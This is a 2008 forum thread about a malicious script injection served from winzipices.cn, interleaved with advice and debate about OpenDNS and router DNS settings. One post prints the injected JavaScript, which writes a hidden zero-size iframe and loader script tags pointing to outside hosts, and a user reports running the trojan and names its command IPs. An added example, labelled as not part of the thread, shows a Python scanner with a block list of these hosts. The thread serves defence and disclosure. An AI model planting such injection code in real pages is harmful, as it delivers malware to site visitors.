+Mystic (MVC), posted May 10, 2008

> You just go into your Network adapter settings, click properties, change the DNS server address, reboot your computer. That's the simplest way.
> If you have a router, change the DNS servers of your router. It's really easy.. http://www.opendns.com/start
> The technology they use is simply amazing.. and it keeps getting better every day. Each day I hear about new improvements or ideas to the backend and frontend of OpenDNS and they are just simply amazing.

I do have a router, but it is connected (like I said above) in a delicate way to the rest of the network. To eliminate a double NAT setup, I currently have my router (Linksys WRT54G) acting as a wireless point (I think is the term) while the modem (SpeedStream 4500) does the routing. Hence, why I am so hesitant to try this. If I were to try it, it wouldn't have any effect if I did it on an individual computer's DNS; the only way it would do something would be if I changed it on the modem, right?

The_Decryptor (Veteran), posted May 10, 2008

> No offense but how? How would this be different from using my ISP's? Can't I already block/filter out tons of stuff with my router?

It'd probably be slower than your ISP (it's about 20 times slower than my ISP's DNS server).

I just use dnsmasq (on my WRT54GL) myself.

Litespeed, posted May 10, 2008

"You're already blocking winzipices.cn. You're blocking Adware sites. This category includes winzipices.cn."

Looks like OpenDNS has already added it to the Adware list.

DaViD_BRaNDoN, posted May 10, 2008

Does anyone from Malaysia use OpenDNS? How's the performance compared to our local ISP (Streamyx) DNS? How do I go about benchmarking OpenDNS vs local ISP DNS?

Jonathan Yaniv (Author), posted May 10, 2008

> Does anyone have any details on the malware itself? What browsers does it affect? What exactly does the malware do, etc? Or better yet, can someone upload the actual malware someplace?

The script being injected is winzipices.cn / 2.js (added space so people don't accidentally go here) - DON'T GO THERE, EVEN THOUGH IT'S A JS FILE

The stuff in that JS file (2.js) is this:

    document.write("<iframe <iframe src=http://winzipices.cn/2.asp width=0 height=0></iframe>")

5.js is this:

    if (navigator.systemLanguage=='zh-cn')
    {
    }
    else{
    document.write("http://winzipices.cn/5.js");
    }
    document.write ('<script language="javascript" type="text/javascript" src="http://js.users.51.la/1856986.js"></script>');

> "You're already blocking winzipices.cn. You're blocking Adware sites. This category includes winzipices.cn."
> Looks like OpenDNS has already added it to the Adware list.

I am a moderator for OpenDNS and I have added it to the Adware category. That's why.

Jonathan Yaniv (Author), posted May 10, 2008

> I do have a router, but it is connected (like I said above) in a delicate way to the rest of the network. To eliminate a double NAT setup, I currently have my router (Linksys WRT54G) acting as a wireless point (I think is the term) while the modem (SpeedStream 4500) does the routing. Hence, why I am so hesitant to try this. If I were to try it, it wouldn't have any effect if I did it on an individual computer's DNS; the only way it would do something would be if I changed it on the modem, right?

Ahh, this took me a while to figure out. OK, this makes sense.

You are using your WRT54G basically as a DHCP server which uses ad-hoc; the default gateway of your router points to the IP address of your modem. The DNS settings of your router will be the address of your modem.

Therefore, if you are able to change the DNS server address of your modem, that would be fine. But if you don't feel comfortable doing it.. don't. I don't think it would mess up your setup.

Jonathan Yaniv (Author), posted May 10, 2008

winzipices.cn isn't the only one :-(

Steve Gosselin, posted May 10, 2008

> winzipices.cn isn't the only one :-(

arfffff :(

Jonathan Yaniv (Author), posted May 10, 2008

> arfffff :(

kisswow.com.cn is another.

Steve Gosselin, posted May 10, 2008

@Jonathan Yaniv: thanks.

Fred Derf (Veteran), posted May 10, 2008

I set my router to use OpenDNS. I have used them before but it must have gotten reset at some point (I probably replaced the router at some point).

ScottKin, posted May 10, 2008

I already use OpenDNS, but as an extra precaution added the listed domains and IP addresses at the SANS site into my router's block-list.

--ScottKin

Jonathan Yaniv (Author), posted May 10, 2008

> I already use OpenDNS, but as an extra precaution added the listed domains and IP addresses at the SANS site into my router's block-list.
> --ScottKin

That works too. I (personally) just blocked all access to any .cn site. I can't read that language.. so I have no use for those kinds of sites.

[deXter], posted May 10, 2008 (edited May 10, 2008 by [deXter])

@Jonathan: So, I've visited all the above mentioned sites, and the sites in the Google search, and the winzipices site itself, executed all the .js files, created a local HTML and manually added the scripts, and I see nothing happening. I did this on a Windows 2003 machine on an admin account on IE 6 with its security and privacy settings reset to the lowest level, without any antivirus, firewall, antispyware, adblocker, DEP, etc. Scanned my PC but no trojans were found; confirmed this with procmon, procexp, autoruns and rootkitrevealer. So is there a bug in this bug or am I missing something?

---

Can someone confirm this in their VM, if they're able to get to the actual trojan?

--

Edit: Managed to manually find the links to the actual malware. Seems one needs to have RealPlayer installed for it to download and execute automatically.

Tested the actual malware - it's a trojan that receives and executes instructions via a config file. At this point of time, it didn't seem to perform any malicious commands as the config file didn't contain any. It just downloaded a second file which makes requests to 61.134.37.15:1800.

I'll get RP later and see if I can manage to get the trojan to auto-execute.

--

Btw, I highly recommend blocking 61.134.37.15 and 61.188.38.158, in addition to winzipices.cn

Good news for AV users is that the majority of them have already added this to their database - except McAfee, Avast and ClamAV.

http://www.virustotal.com/analisis/4e5fead...dea811ea5e41d0b

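Added example, not part of any post in this thread: a Python scanner that a site owner could run over saved pages to find script or frame tags loading from the hosts named above (winzipices.cn, kisswow.com.cn, 61.134.37.15, 61.188.38.158). The sample page and the file names `1.js` and `x.js` are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Indicators named in this thread; a domain entry also matches its subdomains.
BLOCKED_DOMAINS = ("winzipices.cn", "kisswow.com.cn")
BLOCKED_IPS = ("61.134.37.15", "61.188.38.158")

def host_of(url):
    """Host of an absolute or scheme-relative URL; '' for relative URLs."""
    try:
        return (urlsplit(url.strip()).hostname or "").lower().rstrip(".")
    except ValueError:  # malformed authority, e.g. a broken IPv6 literal
        return ""

def is_blocked(host):
    return host in BLOCKED_IPS or any(
        host == d or host.endswith("." + d) for d in BLOCKED_DOMAINS)

class InjectionScanner(HTMLParser):
    """Collects script/iframe/frame tags whose src points at a blocked host."""
    def __init__(self):
        super().__init__()
        self.findings = []  # (line, tag, host, zero_size_frame)
    def handle_starttag(self, tag, attrs):
        if tag not in ("script", "iframe", "frame"):
            return
        a = {k: (v or "") for k, v in attrs}
        host = host_of(a.get("src", ""))
        if is_blocked(host):
            zero = a.get("width") == "0" and a.get("height") == "0"
            self.findings.append((self.getpos()[0], tag, host, zero))

def scan(html):
    s = InjectionScanner()
    s.feed(html)
    s.close()
    return s.findings

# Constructed sample: a page whose database-backed text had tags appended.
SAMPLE = """<html><body>
<h1>Widgets<script src=http://winzipices.cn/2.js></script></h1>
<p>Blue widget<SCRIPT SRC="//www.KissWow.com.cn/1.js"></SCRIPT></p>
<iframe src=http://winzipices.cn/2.asp width=0 height=0></iframe>
<script src="http://61.188.38.158/x.js"></script>
<script src="/js/site.js"></script><a href="/?ref=winzipices.cn">link</a>
</body></html>"""

if __name__ == "__main__":
    for line, tag, host, zero in scan(SAMPLE):
        print(f"line {line}: <{tag}> from {host}" + (" (0x0 frame)" if zero else ""))
```

Matching on the parsed host rather than on a substring keeps ordinary links and look-alike names from being reported.
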
Jonathan Yaniv (Author), posted May 10, 2008

> @Jonathan: So, I've visited all the above mentioned sites, and the sites in the Google search, and the winzipices site itself, executed all the .js files, created a local HTML and manually added the scripts, and I see nothing happening. I did this on a Windows 2003 machine on an admin account on IE 6 with its security and privacy settings reset to the lowest level, without any antivirus, firewall, antispyware, adblocker, DEP, etc. Scanned my PC but no trojans were found; confirmed this with procmon, procexp, autoruns and rootkitrevealer. So is there a bug in this bug or am I missing something?
> ---
> Can someone confirm this in their VM, if they're able to get to the actual trojan?
> --
> Edit: Managed to find the links to the actual malware. Seems one needs to have RealPlayer installed for it to run/execute automatically.

Interesting.. I haven't personally tested it, as I don't want to get the malware, lol.

fhpuqrgrpgvirzhpujbj, posted May 10, 2008

Added to Avast... I think

episode, posted May 10, 2008

> Sure, but if you are like I am, and have a home network, then this is sort of a one-stop-does-all type of fix, rather than going to several PCs and making changes.

In which case, any router worth its salt will also do it.

Randolph, posted May 10, 2008

I don't mean to thread hi-jack...but I want to give this OpenDNS thing a try. What differences will I notice and how do they keep it free are my main questions? Sounds interesting. :)

[deXter], posted May 10, 2008

@Tem, and others: You can also use DNS Advantage and ScrubIT.

The basic advantages are:

- Faster browsing
- Site blocking, independent of OS/software
- Content blocking (pornography, etc)
- Automatic protection against phishing
- Automatically fix typos in website names: e.g. typing yaho.com or gppgle.com will lead you to their correct domains

These public DNS services are free, and generally will continue to remain free.

I personally prefer DNS Advantage as it has many servers worldwide, and particularly, they have a server located very close to where I live.

Jonathan Yaniv (Author), posted May 10, 2008

> I don't mean to thread hi-jack...but I want to give this OpenDNS thing a try. What differences will I notice and how do they keep it free are my main questions? Sounds interesting. :)

- Difference in page / site load time due to its very large DNS cache
- More secure.. you can block the adware category, so no more adware sites will ever load.. a malware category is coming soon btw.
- Block porn sites too.
- Block suspicious responses
- Typo corrections
- Network shortcuts

OpenDNS keeps it free 'cause they get revenue from the ads they have from Overture running on the guide / search pages. Also, they do have paid features, for businesses who need extra features, but OpenDNS can't provide those for free. And I mean the really big businesses.

> @Tem, and others: You can also use DNS Advantage and ScrubIT.
> The basic advantages are:
> - Faster browsing
> - Site blocking, independent of OS/software
> - Content blocking (pornography, etc)
> - Automatic protection against phishing
> - Automatically fix typos in website names: e.g. typing yaho.com or gppgle.com will lead you to their correct domains
> These public DNS services are free, and generally will continue to remain free.
> I personally prefer DNS Advantage as it has many servers worldwide, and particularly, they have a server located very close to where I live.

DNS Advantage is like a cheap knockoff of OpenDNS, they even use the same terminology "dashboard"

The_Decryptor (Veteran), posted May 10, 2008

I haven't heard one explanation about making sites load faster, I've just heard the claim repeated.

Jonathan Yaniv (Author), posted May 10, 2008

> I haven't heard one explanation about making sites load faster, I've just heard the claim repeated.

OpenDNS has servers situated strategically at the most well-connected intersections of the Internet. Unlike your ISP, our network uses Anycast routing technology, which means no matter where you are in the world your DNS requests are answered by our closest datacenter. Anycast routing also means that you are automatically routed to our next closest datacenter in the event of maintenance or downtime. This makes your Internet faster and more reliable.

How we're faster: We have really large caches

Most DNS servers have a small cache. We operate the largest caches in the world (and on the Internet, size matters). This means when you type a website into your address bar, the site loads immediately, instead of making you wait for a small cache to find the answer.

The_Decryptor (Veteran), posted May 10, 2008

My ISP's DNS server is one hop away and can return uncached entries in around 10ms. That's still not going to make my connection faster though.

And OpenDNS caches are going to expire at the same time as my ISP's caches, unless OpenDNS is ignoring the TTL.

[deXter], posted May 10, 2008 (edited May 10, 2008 by [deXter])

> DNS Advantage is like a cheap knockoff of OpenDNS, they even use the same terminology "dashboard"

Maybe, but that doesn't change the fact that they're way faster than OpenDNS (for me). I'm quite surprised that despite being around for so many years, they have such few servers (5, 1 upcoming), while DNS Advantage has so many (14, 3 upcoming).

--

Also, I fail to see how OpenDNS's servers are "situated strategically", considering the fact that most of them ('cept one) are located in the US -_-

In any case, a little bit of competition never harmed anyone :)

Fred Derf (Veteran), posted May 10, 2008

I notice zero speed improvement.